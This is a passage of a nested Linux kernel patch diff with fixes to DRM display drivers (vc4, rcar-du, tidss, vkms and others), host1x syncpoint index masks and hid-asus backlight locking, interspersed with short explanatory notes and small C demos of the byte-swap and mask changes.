++			.possible_crtcs = BIT(2),
++			.port = 2,
++		},
++		[RCAR_DU_OUTPUT_LVDS0] = {
++			.possible_crtcs = BIT(0),
++			.port = 3,
++		},
++	},
++	.num_lvds = 1,
++	.num_rpf = 5,
++	.dpll_mask =  BIT(2) | BIT(1),
++};
++
+ static const struct rcar_du_device_info rcar_du_r8a7796_info = {
+ 	.gen = 3,
+ 	.features = RCAR_DU_FEATURE_CRTC_IRQ
+@@ -554,6 +592,11 @@ static const struct of_device_id rcar_du_of_table[] = {
+ 
+ MODULE_DEVICE_TABLE(of, rcar_du_of_table);
+ 
++static const struct soc_device_attribute rcar_du_soc_table[] = {
++	{ .soc_id = "r8a7795", .revision = "ES1.*", .data = &rcar_du_r8a7795_es1_info },
++	{ /* sentinel */ }
++};
++
+ const char *rcar_du_output_name(enum rcar_du_output output)
+ {
+ 	static const char * const names[] = {
+@@ -645,6 +688,7 @@ static void rcar_du_shutdown(struct platform_device *pdev)
+ 
+ static int rcar_du_probe(struct platform_device *pdev)
+ {
++	const struct soc_device_attribute *soc_attr;
+ 	struct rcar_du_device *rcdu;
+ 	unsigned int mask;
+ 	int ret;
+@@ -659,8 +703,13 @@ static int rcar_du_probe(struct platform_device *pdev)
+ 		return PTR_ERR(rcdu);
+ 
+ 	rcdu->dev = &pdev->dev;
++
+ 	rcdu->info = of_device_get_match_data(rcdu->dev);
+ 
++	soc_attr = soc_device_match(rcar_du_soc_table);
++	if (soc_attr)
++		rcdu->info = soc_attr->data;
++
+ 	platform_set_drvdata(pdev, rcdu);
+ 
+ 	/* I/O resources */
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_drv.h b/drivers/gpu/drm/rcar-du/rcar_du_drv.h
+index 5cfa2bb7ad93d..acc3673fefe18 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_drv.h
++++ b/drivers/gpu/drm/rcar-du/rcar_du_drv.h
+@@ -34,6 +34,8 @@ struct rcar_du_device;
+ #define RCAR_DU_FEATURE_NO_BLENDING	BIT(5)	/* PnMR.SPIM does not have ALP nor EOR bits */
+ 
+ #define RCAR_DU_QUIRK_ALIGN_128B	BIT(0)	/* Align pitches to 128 bytes */
++#define RCAR_DU_QUIRK_H3_ES1_PCLK_STABILITY BIT(1)	/* H3 ES1 has pclk stability issue */
++#define RCAR_DU_QUIRK_H3_ES1_PLL	BIT(2)	/* H3 ES1 PLL setup differs from non-ES1 */
+ 
+ enum rcar_du_output {
+ 	RCAR_DU_OUTPUT_DPAD0,
+diff --git a/drivers/gpu/drm/rcar-du/rcar_du_regs.h b/drivers/gpu/drm/rcar-du/rcar_du_regs.h
+index c1bcb0e8b5b4e..789ae9285108e 100644
+--- a/drivers/gpu/drm/rcar-du/rcar_du_regs.h
++++ b/drivers/gpu/drm/rcar-du/rcar_du_regs.h
+@@ -283,12 +283,8 @@
+ #define DPLLCR			0x20044
+ #define DPLLCR_CODE		(0x95 << 24)
+ #define DPLLCR_PLCS1		(1 << 23)
+-/*
+- * PLCS0 is bit 21, but H3 ES1.x requires bit 20 to be set as well. As bit 20
+- * isn't implemented by other SoC in the Gen3 family it can safely be set
+- * unconditionally.
+- */
+-#define DPLLCR_PLCS0		(3 << 20)
++#define DPLLCR_PLCS0_PLL	(1 << 21)
++#define DPLLCR_PLCS0_H3ES1X_PLL1	(1 << 20)
+ #define DPLLCR_CLKE		(1 << 18)
+ #define DPLLCR_FDPLL(n)		((n) << 12)
+ #define DPLLCR_N(n)		((n) << 5)
+diff --git a/drivers/gpu/drm/tegra/firewall.c b/drivers/gpu/drm/tegra/firewall.c
+index 1824d2db0e2ce..d53f890fa6893 100644
+--- a/drivers/gpu/drm/tegra/firewall.c
++++ b/drivers/gpu/drm/tegra/firewall.c
+@@ -97,6 +97,9 @@ static int fw_check_regs_imm(struct tegra_drm_firewall *fw, u32 offset)
+ {
+ 	bool is_addr;
+ 
++	if (!fw->client->ops->is_addr_reg)
++		return 0;
++
+ 	is_addr = fw->client->ops->is_addr_reg(fw->client->base.dev, fw->class,
+ 					       offset);
+ 	if (is_addr)
+diff --git a/drivers/gpu/drm/tidss/tidss_dispc.c b/drivers/gpu/drm/tidss/tidss_dispc.c
+index ad93acc9abd2a..16301bdfead12 100644
+--- a/drivers/gpu/drm/tidss/tidss_dispc.c
++++ b/drivers/gpu/drm/tidss/tidss_dispc.c
+@@ -1858,8 +1858,8 @@ static const struct {
+ 	{ DRM_FORMAT_XBGR4444, 0x21, },
+ 	{ DRM_FORMAT_RGBX4444, 0x22, },
+ 
+-	{ DRM_FORMAT_ARGB1555, 0x25, },
+-	{ DRM_FORMAT_ABGR1555, 0x26, },
++	{ DRM_FORMAT_XRGB1555, 0x25, },
++	{ DRM_FORMAT_XBGR1555, 0x26, },
+ 
+ 	{ DRM_FORMAT_XRGB8888, 0x27, },
+ 	{ DRM_FORMAT_XBGR8888, 0x28, },
+diff --git a/drivers/gpu/drm/tiny/ili9486.c b/drivers/gpu/drm/tiny/ili9486.c
+index c80028bb1d110..7b3048a3d9086 100644
+--- a/drivers/gpu/drm/tiny/ili9486.c
++++ b/drivers/gpu/drm/tiny/ili9486.c
+@@ -43,6 +43,7 @@ static int waveshare_command(struct mipi_dbi *mipi, u8 *cmd, u8 *par,
+ 			     size_t num)
+ {
+ 	struct spi_device *spi = mipi->spi;
++	unsigned int bpw = 8;
+ 	void *data = par;
+ 	u32 speed_hz;
+ 	int i, ret;
+@@ -56,8 +57,6 @@ static int waveshare_command(struct mipi_dbi *mipi, u8 *cmd, u8 *par,
+ 	 * The displays are Raspberry Pi HATs and connected to the 8-bit only
+ 	 * SPI controller, so 16-bit command and parameters need byte swapping
+ 	 * before being transferred as 8-bit on the big endian SPI bus.
+-	 * Pixel data bytes have already been swapped before this function is
+-	 * called.
+ 	 */
+ 	buf[0] = cpu_to_be16(*cmd);
+ 	gpiod_set_value_cansleep(mipi->dc, 0);
+@@ -71,12 +70,18 @@ static int waveshare_command(struct mipi_dbi *mipi, u8 *cmd, u8 *par,
+ 		for (i = 0; i < num; i++)
+ 			buf[i] = cpu_to_be16(par[i]);
+ 		num *= 2;
+-		speed_hz = mipi_dbi_spi_cmd_max_speed(spi, num);
+ 		data = buf;
+ 	}
+ 
++	/*
++	 * Check whether the pixel data bytes need to be swapped
++	 */
++	if (*cmd == MIPI_DCS_WRITE_MEMORY_START && !mipi->swap_bytes)
++		bpw = 16;
++
+ 	gpiod_set_value_cansleep(mipi->dc, 1);
+-	ret = mipi_dbi_spi_transfer(spi, speed_hz, 8, data, num);
++	speed_hz = mipi_dbi_spi_cmd_max_speed(spi, num);
++	ret = mipi_dbi_spi_transfer(spi, speed_hz, bpw, data, num);
+  free:
+ 	kfree(buf);
+ 
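The waveshare_command() rework above transfers pixel data as 16-bit words when the MIPI DBI core has not pre-swapped the bytes; everything else still goes through the cpu_to_be16() swap shown in the hunk. A runnable sketch of what that swap does on a little-endian host (the parameter values are arbitrary):

#include <stdio.h>
#include <stdint.h>

/* userspace equivalent of cpu_to_be16() on a little-endian machine */
static uint16_t to_be16(uint16_t v)
{
	return (uint16_t)((v << 8) | (v >> 8));
}

int main(void)
{
	uint16_t par[2] = { 0x1234, 0xABCD };	/* 16-bit parameters */
	const uint8_t *bytes = (const uint8_t *)par;
	size_t i;

	for (i = 0; i < 2; i++)
		par[i] = to_be16(par[i]);

	/* the 8-bit bus now clocks out 12 34 AB CD, MSB first */
	for (i = 0; i < sizeof(par); i++)
		printf("%02X ", bytes[i]);
	printf("\n");
	return 0;
}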
+diff --git a/drivers/gpu/drm/vc4/vc4_dpi.c b/drivers/gpu/drm/vc4/vc4_dpi.c
+index 1f8f44b7b5a5f..61ef7d232a12c 100644
+--- a/drivers/gpu/drm/vc4/vc4_dpi.c
++++ b/drivers/gpu/drm/vc4/vc4_dpi.c
+@@ -179,7 +179,7 @@ static void vc4_dpi_encoder_enable(struct drm_encoder *encoder)
+ 						       DPI_FORMAT);
+ 				break;
+ 			case MEDIA_BUS_FMT_RGB565_1X16:
+-				dpi_c |= VC4_SET_FIELD(DPI_FORMAT_16BIT_565_RGB_3,
++				dpi_c |= VC4_SET_FIELD(DPI_FORMAT_16BIT_565_RGB_1,
+ 						       DPI_FORMAT);
+ 				break;
+ 			default:
+diff --git a/drivers/gpu/drm/vc4/vc4_hdmi.c b/drivers/gpu/drm/vc4/vc4_hdmi.c
+index c4b73d9dd0409..ea2eaf6032caa 100644
+--- a/drivers/gpu/drm/vc4/vc4_hdmi.c
++++ b/drivers/gpu/drm/vc4/vc4_hdmi.c
+@@ -402,6 +402,7 @@ static void vc4_hdmi_handle_hotplug(struct vc4_hdmi *vc4_hdmi,
+ {
+ 	struct drm_connector *connector = &vc4_hdmi->connector;
+ 	struct edid *edid;
++	int ret;
+ 
+ 	/*
+ 	 * NOTE: This function should really be called with
+@@ -430,7 +431,15 @@ static void vc4_hdmi_handle_hotplug(struct vc4_hdmi *vc4_hdmi,
+ 	cec_s_phys_addr_from_edid(vc4_hdmi->cec_adap, edid);
+ 	kfree(edid);
+ 
+-	vc4_hdmi_reset_link(connector, ctx);
++	for (;;) {
++		ret = vc4_hdmi_reset_link(connector, ctx);
++		if (ret == -EDEADLK) {
++			drm_modeset_backoff(ctx);
++			continue;
++		}
++
++		break;
++	}
+ }
+ 
+ static int vc4_hdmi_connector_detect_ctx(struct drm_connector *connector,
+@@ -1297,11 +1306,12 @@ static void vc5_hdmi_set_timings(struct vc4_hdmi *vc4_hdmi,
+ 		     VC4_SET_FIELD(mode->crtc_vdisplay, VC5_HDMI_VERTA_VAL));
+ 	u32 vertb = (VC4_SET_FIELD(mode->htotal >> (2 - pixel_rep),
+ 				   VC5_HDMI_VERTB_VSPO) |
+-		     VC4_SET_FIELD(mode->crtc_vtotal - mode->crtc_vsync_end,
++		     VC4_SET_FIELD(mode->crtc_vtotal - mode->crtc_vsync_end +
++				   interlaced,
+ 				   VC4_HDMI_VERTB_VBP));
+ 	u32 vertb_even = (VC4_SET_FIELD(0, VC5_HDMI_VERTB_VSPO) |
+ 			  VC4_SET_FIELD(mode->crtc_vtotal -
+-					mode->crtc_vsync_end - interlaced,
++					mode->crtc_vsync_end,
+ 					VC4_HDMI_VERTB_VBP));
+ 	unsigned long flags;
+ 	unsigned char gcp;
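The hotplug fix above wraps vc4_hdmi_reset_link() in the standard DRM acquire-context idiom: any helper taking a drm_modeset_acquire_ctx may fail with -EDEADLK, and the caller must then drop its locks, back off, and retry. A kernel-style fragment of the full pattern for reference (do_something_locked() is a hypothetical placeholder; this is not buildable outside the kernel):

struct drm_modeset_acquire_ctx ctx;
int ret;

drm_modeset_acquire_init(&ctx, 0);
retry:
	ret = do_something_locked(connector, &ctx);	/* may return -EDEADLK */
	if (ret == -EDEADLK) {
		/* drop every held lock, wait for the contended one, retry */
		drm_modeset_backoff(&ctx);
		goto retry;
	}
drm_modeset_drop_locks(&ctx);
drm_modeset_acquire_fini(&ctx);

In the hunk above the acquire context is owned by the caller, so only the backoff-and-retry half of the idiom appears.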
+diff --git a/drivers/gpu/drm/vc4/vc4_hvs.c b/drivers/gpu/drm/vc4/vc4_hvs.c
+index 4ac9f5a2d5f99..47990ecbfc4df 100644
+--- a/drivers/gpu/drm/vc4/vc4_hvs.c
++++ b/drivers/gpu/drm/vc4/vc4_hvs.c
+@@ -368,28 +368,30 @@ static int vc4_hvs_init_channel(struct vc4_hvs *hvs, struct drm_crtc *crtc,
+ 	 * mode.
+ 	 */
+ 	dispctrl = SCALER_DISPCTRLX_ENABLE;
++	dispbkgndx = HVS_READ(SCALER_DISPBKGNDX(chan));
+ 
+-	if (!vc4->is_vc5)
++	if (!vc4->is_vc5) {
+ 		dispctrl |= VC4_SET_FIELD(mode->hdisplay,
+ 					  SCALER_DISPCTRLX_WIDTH) |
+ 			    VC4_SET_FIELD(mode->vdisplay,
+ 					  SCALER_DISPCTRLX_HEIGHT) |
+ 			    (oneshot ? SCALER_DISPCTRLX_ONESHOT : 0);
+-	else
++		dispbkgndx |= SCALER_DISPBKGND_AUTOHS;
++	} else {
+ 		dispctrl |= VC4_SET_FIELD(mode->hdisplay,
+ 					  SCALER5_DISPCTRLX_WIDTH) |
+ 			    VC4_SET_FIELD(mode->vdisplay,
+ 					  SCALER5_DISPCTRLX_HEIGHT) |
+ 			    (oneshot ? SCALER5_DISPCTRLX_ONESHOT : 0);
++		dispbkgndx &= ~SCALER5_DISPBKGND_BCK2BCK;
++	}
+ 
+ 	HVS_WRITE(SCALER_DISPCTRLX(chan), dispctrl);
+ 
+-	dispbkgndx = HVS_READ(SCALER_DISPBKGNDX(chan));
+ 	dispbkgndx &= ~SCALER_DISPBKGND_GAMMA;
+ 	dispbkgndx &= ~SCALER_DISPBKGND_INTERLACE;
+ 
+ 	HVS_WRITE(SCALER_DISPBKGNDX(chan), dispbkgndx |
+-		  SCALER_DISPBKGND_AUTOHS |
+ 		  ((!vc4->is_vc5) ? SCALER_DISPBKGND_GAMMA : 0) |
+ 		  (interlace ? SCALER_DISPBKGND_INTERLACE : 0));
+ 
+@@ -656,7 +658,8 @@ void vc4_hvs_mask_underrun(struct vc4_hvs *hvs, int channel)
+ 		return;
+ 
+ 	dispctrl = HVS_READ(SCALER_DISPCTRL);
+-	dispctrl &= ~SCALER_DISPCTRL_DSPEISLUR(channel);
++	dispctrl &= ~(hvs->vc4->is_vc5 ? SCALER5_DISPCTRL_DSPEISLUR(channel) :
++					 SCALER_DISPCTRL_DSPEISLUR(channel));
+ 
+ 	HVS_WRITE(SCALER_DISPCTRL, dispctrl);
+ 
+@@ -673,7 +676,8 @@ void vc4_hvs_unmask_underrun(struct vc4_hvs *hvs, int channel)
+ 		return;
+ 
+ 	dispctrl = HVS_READ(SCALER_DISPCTRL);
+-	dispctrl |= SCALER_DISPCTRL_DSPEISLUR(channel);
++	dispctrl |= (hvs->vc4->is_vc5 ? SCALER5_DISPCTRL_DSPEISLUR(channel) :
++					SCALER_DISPCTRL_DSPEISLUR(channel));
+ 
+ 	HVS_WRITE(SCALER_DISPSTAT,
+ 		  SCALER_DISPSTAT_EUFLOW(channel));
+@@ -699,6 +703,7 @@ static irqreturn_t vc4_hvs_irq_handler(int irq, void *data)
+ 	int channel;
+ 	u32 control;
+ 	u32 status;
++	u32 dspeislur;
+ 
+ 	/*
+ 	 * NOTE: We don't need to protect the register access using
+@@ -715,9 +720,11 @@ static irqreturn_t vc4_hvs_irq_handler(int irq, void *data)
+ 	control = HVS_READ(SCALER_DISPCTRL);
+ 
+ 	for (channel = 0; channel < SCALER_CHANNELS_COUNT; channel++) {
++		dspeislur = vc4->is_vc5 ? SCALER5_DISPCTRL_DSPEISLUR(channel) :
++					  SCALER_DISPCTRL_DSPEISLUR(channel);
+ 		/* Interrupt masking is not always honored, so check it here. */
+ 		if (status & SCALER_DISPSTAT_EUFLOW(channel) &&
+-		    control & SCALER_DISPCTRL_DSPEISLUR(channel)) {
++		    control & dspeislur) {
+ 			vc4_hvs_mask_underrun(hvs, channel);
+ 			vc4_hvs_report_underrun(dev);
+ 
+@@ -870,19 +877,45 @@ static int vc4_hvs_bind(struct device *dev, struct device *master, void *data)
+ 		    SCALER_DISPCTRL_DISPEIRQ(1) |
+ 		    SCALER_DISPCTRL_DISPEIRQ(2);
+ 
+-	dispctrl &= ~(SCALER_DISPCTRL_DMAEIRQ |
+-		      SCALER_DISPCTRL_SLVWREIRQ |
+-		      SCALER_DISPCTRL_SLVRDEIRQ |
+-		      SCALER_DISPCTRL_DSPEIEOF(0) |
+-		      SCALER_DISPCTRL_DSPEIEOF(1) |
+-		      SCALER_DISPCTRL_DSPEIEOF(2) |
+-		      SCALER_DISPCTRL_DSPEIEOLN(0) |
+-		      SCALER_DISPCTRL_DSPEIEOLN(1) |
+-		      SCALER_DISPCTRL_DSPEIEOLN(2) |
+-		      SCALER_DISPCTRL_DSPEISLUR(0) |
+-		      SCALER_DISPCTRL_DSPEISLUR(1) |
+-		      SCALER_DISPCTRL_DSPEISLUR(2) |
+-		      SCALER_DISPCTRL_SCLEIRQ);
++	if (!vc4->is_vc5)
++		dispctrl &= ~(SCALER_DISPCTRL_DMAEIRQ |
++			      SCALER_DISPCTRL_SLVWREIRQ |
++			      SCALER_DISPCTRL_SLVRDEIRQ |
++			      SCALER_DISPCTRL_DSPEIEOF(0) |
++			      SCALER_DISPCTRL_DSPEIEOF(1) |
++			      SCALER_DISPCTRL_DSPEIEOF(2) |
++			      SCALER_DISPCTRL_DSPEIEOLN(0) |
++			      SCALER_DISPCTRL_DSPEIEOLN(1) |
++			      SCALER_DISPCTRL_DSPEIEOLN(2) |
++			      SCALER_DISPCTRL_DSPEISLUR(0) |
++			      SCALER_DISPCTRL_DSPEISLUR(1) |
++			      SCALER_DISPCTRL_DSPEISLUR(2) |
++			      SCALER_DISPCTRL_SCLEIRQ);
++	else
++		dispctrl &= ~(SCALER_DISPCTRL_DMAEIRQ |
++			      SCALER5_DISPCTRL_SLVEIRQ |
++			      SCALER5_DISPCTRL_DSPEIEOF(0) |
++			      SCALER5_DISPCTRL_DSPEIEOF(1) |
++			      SCALER5_DISPCTRL_DSPEIEOF(2) |
++			      SCALER5_DISPCTRL_DSPEIEOLN(0) |
++			      SCALER5_DISPCTRL_DSPEIEOLN(1) |
++			      SCALER5_DISPCTRL_DSPEIEOLN(2) |
++			      SCALER5_DISPCTRL_DSPEISLUR(0) |
++			      SCALER5_DISPCTRL_DSPEISLUR(1) |
++			      SCALER5_DISPCTRL_DSPEISLUR(2) |
++			      SCALER_DISPCTRL_SCLEIRQ);
++
++
++	/* Set AXI panic mode.
++	 * VC4 panics when fewer than 2 lines are in the FIFO.
++	 * VC5 panics when fewer than 1 line is in the FIFO.
++	 */
++	dispctrl &= ~(SCALER_DISPCTRL_PANIC0_MASK |
++		      SCALER_DISPCTRL_PANIC1_MASK |
++		      SCALER_DISPCTRL_PANIC2_MASK);
++	dispctrl |= VC4_SET_FIELD(2, SCALER_DISPCTRL_PANIC0);
++	dispctrl |= VC4_SET_FIELD(2, SCALER_DISPCTRL_PANIC1);
++	dispctrl |= VC4_SET_FIELD(2, SCALER_DISPCTRL_PANIC2);
+ 
+ 	HVS_WRITE(SCALER_DISPCTRL, dispctrl);
+ 
+diff --git a/drivers/gpu/drm/vc4/vc4_plane.c b/drivers/gpu/drm/vc4/vc4_plane.c
+index bd5acc4a86876..eb08020154f30 100644
+--- a/drivers/gpu/drm/vc4/vc4_plane.c
++++ b/drivers/gpu/drm/vc4/vc4_plane.c
+@@ -75,11 +75,13 @@ static const struct hvs_format {
+ 		.drm = DRM_FORMAT_ARGB1555,
+ 		.hvs = HVS_PIXEL_FORMAT_RGBA5551,
+ 		.pixel_order = HVS_PIXEL_ORDER_ABGR,
++		.pixel_order_hvs5 = HVS_PIXEL_ORDER_ARGB,
+ 	},
+ 	{
+ 		.drm = DRM_FORMAT_XRGB1555,
+ 		.hvs = HVS_PIXEL_FORMAT_RGBA5551,
+ 		.pixel_order = HVS_PIXEL_ORDER_ABGR,
++		.pixel_order_hvs5 = HVS_PIXEL_ORDER_ARGB,
+ 	},
+ 	{
+ 		.drm = DRM_FORMAT_RGB888,
+diff --git a/drivers/gpu/drm/vc4/vc4_regs.h b/drivers/gpu/drm/vc4/vc4_regs.h
+index f0290fad991de..1256f0877ff66 100644
+--- a/drivers/gpu/drm/vc4/vc4_regs.h
++++ b/drivers/gpu/drm/vc4/vc4_regs.h
+@@ -220,6 +220,12 @@
+ #define SCALER_DISPCTRL                         0x00000000
+ /* Global register for clock gating the HVS */
+ # define SCALER_DISPCTRL_ENABLE			BIT(31)
++# define SCALER_DISPCTRL_PANIC0_MASK		VC4_MASK(25, 24)
++# define SCALER_DISPCTRL_PANIC0_SHIFT		24
++# define SCALER_DISPCTRL_PANIC1_MASK		VC4_MASK(27, 26)
++# define SCALER_DISPCTRL_PANIC1_SHIFT		26
++# define SCALER_DISPCTRL_PANIC2_MASK		VC4_MASK(29, 28)
++# define SCALER_DISPCTRL_PANIC2_SHIFT		28
+ # define SCALER_DISPCTRL_DSP3_MUX_MASK		VC4_MASK(19, 18)
+ # define SCALER_DISPCTRL_DSP3_MUX_SHIFT		18
+ 
+@@ -228,15 +234,21 @@
+  * always enabled.
+  */
+ # define SCALER_DISPCTRL_DSPEISLUR(x)		BIT(13 + (x))
++# define SCALER5_DISPCTRL_DSPEISLUR(x)		BIT(9 + ((x) * 4))
+ /* Enables Display 0 end-of-line-N contribution to
+  * SCALER_DISPSTAT_IRQDISP0
+  */
+ # define SCALER_DISPCTRL_DSPEIEOLN(x)		BIT(8 + ((x) * 2))
++# define SCALER5_DISPCTRL_DSPEIEOLN(x)		BIT(8 + ((x) * 4))
+ /* Enables Display 0 EOF contribution to SCALER_DISPSTAT_IRQDISP0 */
+ # define SCALER_DISPCTRL_DSPEIEOF(x)		BIT(7 + ((x) * 2))
++# define SCALER5_DISPCTRL_DSPEIEOF(x)		BIT(7 + ((x) * 4))
+ 
+-# define SCALER_DISPCTRL_SLVRDEIRQ		BIT(6)
+-# define SCALER_DISPCTRL_SLVWREIRQ		BIT(5)
++# define SCALER5_DISPCTRL_DSPEIVST(x)		BIT(6 + ((x) * 4))
++
++# define SCALER_DISPCTRL_SLVRDEIRQ		BIT(6)	/* HVS4 only */
++# define SCALER_DISPCTRL_SLVWREIRQ		BIT(5)	/* HVS4 only */
++# define SCALER5_DISPCTRL_SLVEIRQ		BIT(5)
+ # define SCALER_DISPCTRL_DMAEIRQ		BIT(4)
+ /* Enables interrupt generation on the enabled EOF/EOLN/EISLUR
+  * bits and short frames.
+@@ -360,6 +372,7 @@
+ 
+ #define SCALER_DISPBKGND0                       0x00000044
+ # define SCALER_DISPBKGND_AUTOHS		BIT(31)
++# define SCALER5_DISPBKGND_BCK2BCK		BIT(31)
+ # define SCALER_DISPBKGND_INTERLACE		BIT(30)
+ # define SCALER_DISPBKGND_GAMMA			BIT(29)
+ # define SCALER_DISPBKGND_TESTMODE_MASK		VC4_MASK(28, 25)
+diff --git a/drivers/gpu/drm/vkms/vkms_drv.c b/drivers/gpu/drm/vkms/vkms_drv.c
+index 0ffe5f0e33f75..f716c5796f5fc 100644
+--- a/drivers/gpu/drm/vkms/vkms_drv.c
++++ b/drivers/gpu/drm/vkms/vkms_drv.c
+@@ -57,7 +57,8 @@ static void vkms_release(struct drm_device *dev)
+ {
+ 	struct vkms_device *vkms = drm_device_to_vkms_device(dev);
+ 
+-	destroy_workqueue(vkms->output.composer_workq);
++	if (vkms->output.composer_workq)
++		destroy_workqueue(vkms->output.composer_workq);
+ }
+ 
+ static void vkms_atomic_commit_tail(struct drm_atomic_state *old_state)
+@@ -218,6 +219,7 @@ out_unregister:
+ 
+ static int __init vkms_init(void)
+ {
++	int ret;
+ 	struct vkms_config *config;
+ 
+ 	config = kmalloc(sizeof(*config), GFP_KERNEL);
+@@ -230,7 +232,11 @@ static int __init vkms_init(void)
+ 	config->writeback = enable_writeback;
+ 	config->overlay = enable_overlay;
+ 
+-	return vkms_create(config);
++	ret = vkms_create(config);
++	if (ret)
++		kfree(config);
++
++	return ret;
+ }
+ 
+ static void vkms_destroy(struct vkms_config *config)
+diff --git a/drivers/gpu/host1x/hw/hw_host1x06_uclass.h b/drivers/gpu/host1x/hw/hw_host1x06_uclass.h
+index 5f831438d19bb..50c32de452fb1 100644
+--- a/drivers/gpu/host1x/hw/hw_host1x06_uclass.h
++++ b/drivers/gpu/host1x/hw/hw_host1x06_uclass.h
+@@ -53,7 +53,7 @@ static inline u32 host1x_uclass_incr_syncpt_cond_f(u32 v)
+ 	host1x_uclass_incr_syncpt_cond_f(v)
+ static inline u32 host1x_uclass_incr_syncpt_indx_f(u32 v)
+ {
+-	return (v & 0xff) << 0;
++	return (v & 0x3ff) << 0;
+ }
+ #define HOST1X_UCLASS_INCR_SYNCPT_INDX_F(v) \
+ 	host1x_uclass_incr_syncpt_indx_f(v)
+diff --git a/drivers/gpu/host1x/hw/hw_host1x07_uclass.h b/drivers/gpu/host1x/hw/hw_host1x07_uclass.h
+index 8cd2ef087d5d0..887b878f92f79 100644
+--- a/drivers/gpu/host1x/hw/hw_host1x07_uclass.h
++++ b/drivers/gpu/host1x/hw/hw_host1x07_uclass.h
+@@ -53,7 +53,7 @@ static inline u32 host1x_uclass_incr_syncpt_cond_f(u32 v)
+ 	host1x_uclass_incr_syncpt_cond_f(v)
+ static inline u32 host1x_uclass_incr_syncpt_indx_f(u32 v)
+ {
+-	return (v & 0xff) << 0;
++	return (v & 0x3ff) << 0;
+ }
+ #define HOST1X_UCLASS_INCR_SYNCPT_INDX_F(v) \
+ 	host1x_uclass_incr_syncpt_indx_f(v)
+diff --git a/drivers/gpu/host1x/hw/hw_host1x08_uclass.h b/drivers/gpu/host1x/hw/hw_host1x08_uclass.h
+index 724cccd71aa1a..4fb1d090edae5 100644
+--- a/drivers/gpu/host1x/hw/hw_host1x08_uclass.h
++++ b/drivers/gpu/host1x/hw/hw_host1x08_uclass.h
+@@ -53,7 +53,7 @@ static inline u32 host1x_uclass_incr_syncpt_cond_f(u32 v)
+ 	host1x_uclass_incr_syncpt_cond_f(v)
+ static inline u32 host1x_uclass_incr_syncpt_indx_f(u32 v)
+ {
+-	return (v & 0xff) << 0;
++	return (v & 0x3ff) << 0;
+ }
+ #define HOST1X_UCLASS_INCR_SYNCPT_INDX_F(v) \
+ 	host1x_uclass_incr_syncpt_indx_f(v)
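The three uclass header hunks above widen the syncpoint-index field mask from 0xff to 0x3ff, i.e. from 8 to 10 bits. A runnable demonstration of why the narrow mask corrupts syncpoint ids above 255 (the id value is arbitrary):

#include <stdio.h>

int main(void)
{
	unsigned int v = 300;	/* a syncpoint id above 255 */

	printf("old mask: %u\n", v & 0xff);	/* 44  - wrong syncpoint */
	printf("new mask: %u\n", v & 0x3ff);	/* 300 - id preserved */
	return 0;
}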
+diff --git a/drivers/gpu/host1x/hw/syncpt_hw.c b/drivers/gpu/host1x/hw/syncpt_hw.c
+index dd39d67ccec36..8cf35b2eff3db 100644
+--- a/drivers/gpu/host1x/hw/syncpt_hw.c
++++ b/drivers/gpu/host1x/hw/syncpt_hw.c
+@@ -106,9 +106,6 @@ static void syncpt_assign_to_channel(struct host1x_syncpt *sp,
+ #if HOST1X_HW >= 6
+ 	struct host1x *host = sp->host;
+ 
+-	if (!host->hv_regs)
+-		return;
+-
+ 	host1x_sync_writel(host,
+ 			   HOST1X_SYNC_SYNCPT_CH_APP_CH(ch ? ch->id : 0xff),
+ 			   HOST1X_SYNC_SYNCPT_CH_APP(sp->id));
+diff --git a/drivers/gpu/ipu-v3/ipu-common.c b/drivers/gpu/ipu-v3/ipu-common.c
+index 118318513e2d2..c35eac1116f5f 100644
+--- a/drivers/gpu/ipu-v3/ipu-common.c
++++ b/drivers/gpu/ipu-v3/ipu-common.c
+@@ -1165,6 +1165,7 @@ static int ipu_add_client_devices(struct ipu_soc *ipu, unsigned long ipu_base)
+ 		pdev = platform_device_alloc(reg->name, id++);
+ 		if (!pdev) {
+ 			ret = -ENOMEM;
++			of_node_put(of_node);
+ 			goto err_register;
+ 		}
+ 
+diff --git a/drivers/hid/hid-asus.c b/drivers/hid/hid-asus.c
+index f99752b998f3d..d1094bb1aa429 100644
+--- a/drivers/hid/hid-asus.c
++++ b/drivers/hid/hid-asus.c
+@@ -98,6 +98,7 @@ struct asus_kbd_leds {
+ 	struct hid_device *hdev;
+ 	struct work_struct work;
+ 	unsigned int brightness;
++	spinlock_t lock;
+ 	bool removed;
+ };
+ 
+@@ -490,21 +491,42 @@ static int rog_nkey_led_init(struct hid_device *hdev)
+ 	return ret;
+ }
+ 
++static void asus_schedule_work(struct asus_kbd_leds *led)
++{
++	unsigned long flags;
++
++	spin_lock_irqsave(&led->lock, flags);
++	if (!led->removed)
++		schedule_work(&led->work);
++	spin_unlock_irqrestore(&led->lock, flags);
++}
++
+ static void asus_kbd_backlight_set(struct led_classdev *led_cdev,
+ 				   enum led_brightness brightness)
+ {
+ 	struct asus_kbd_leds *led = container_of(led_cdev, struct asus_kbd_leds,
+ 						 cdev);
++	unsigned long flags;
++
++	spin_lock_irqsave(&led->lock, flags);
+ 	led->brightness = brightness;
+-	schedule_work(&led->work);
++	spin_unlock_irqrestore(&led->lock, flags);
++
++	asus_schedule_work(led);
+ }
+ 
+ static enum led_brightness asus_kbd_backlight_get(struct led_classdev *led_cdev)
+ {
+ 	struct asus_kbd_leds *led = container_of(led_cdev, struct asus_kbd_leds,
+ 						 cdev);
++	enum led_brightness brightness;
++	unsigned long flags;
++
++	spin_lock_irqsave(&led->lock, flags);
++	brightness = led->brightness;
++	spin_unlock_irqrestore(&led->lock, flags);
+ 
+-	return led->brightness;
++	return brightness;
+ }
+ 
+ static void asus_kbd_backlight_work(struct work_struct *work)
+@@ -512,11 +534,11 @@ static void asus_kbd_backlight_work(struct work_struct *work)
+ 	struct asus_kbd_leds *led = container_of(work, struct asus_kbd_leds, work);
+ 	u8 buf[] = { FEATURE_KBD_REPORT_ID, 0xba, 0xc5, 0xc4, 0x00 };
+ 	int ret;
++	unsigned long flags;
+ 
+-	if (led->removed)
+-		return;
+-
++	spin_lock_irqsave(&led->lock, flags);
+ 	buf[4] = led->brightness;
++	spin_unlock_irqrestore(&led->lock, flags);
+ 
+ 	ret = asus_kbd_set_report(led->hdev, buf, sizeof(buf));
+ 	if (ret < 0)
+@@ -584,6 +606,7 @@ static int asus_kbd_register_leds(struct hid_device *hdev)
+ 	drvdata->kbd_backlight->cdev.brightness_set = asus_kbd_backlight_set;
+ 	drvdata->kbd_backlight->cdev.brightness_get = asus_kbd_backlight_get;
+ 	INIT_WORK(&drvdata->kbd_backlight->work, asus_kbd_backlight_work);
